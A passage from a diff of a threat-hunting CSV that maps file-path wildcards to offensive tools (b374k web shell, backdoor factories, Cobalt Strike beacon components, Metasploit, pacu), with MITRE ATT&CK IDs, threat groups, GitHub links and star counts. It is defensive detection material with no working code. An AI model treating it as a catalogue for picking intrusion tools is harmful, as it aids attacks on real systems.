- TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*/AzureHound.ps1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/B374K*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2248","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*/B374K*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*/BabelStrike.git*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" "*/BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" "*/BackDoor*","offensive_tool_keyword","_","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*/backdoor/traitor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*/backdoor_all_users.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/backdoor_apk*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8267","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE 
ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/backdoor/traitor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/backdoor_all_users.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/backdoor_apk*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" "*/backoff.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/backorifice-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/backorifice-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -2793,46 +2796,49 @@ "*/bashexplode/boko*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*/Bashfuscator*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*/Bates.csproj*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*/batik_svg*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/batik_svg*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/bazarloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/bbaranoff/CVE-2022-0847/*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" 
"*/beacon.h","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*/beacon_202_no_acl.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/beacon_257-objects.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - 
TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/beacon_compatibility*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" -"*/beacon_compatibility.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*/beacon_compatibility.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*/beacon_funcs/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/beacon_health_check/*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*/beacon_http/*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/beacon_notify.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/beacon_notify.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/BeaconChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/beaconhealth.cna*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*/beacon-injection/*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 
- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/beacon-object-file*","offensive_tool_keyword","cobaltstrike","Cobaltstrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 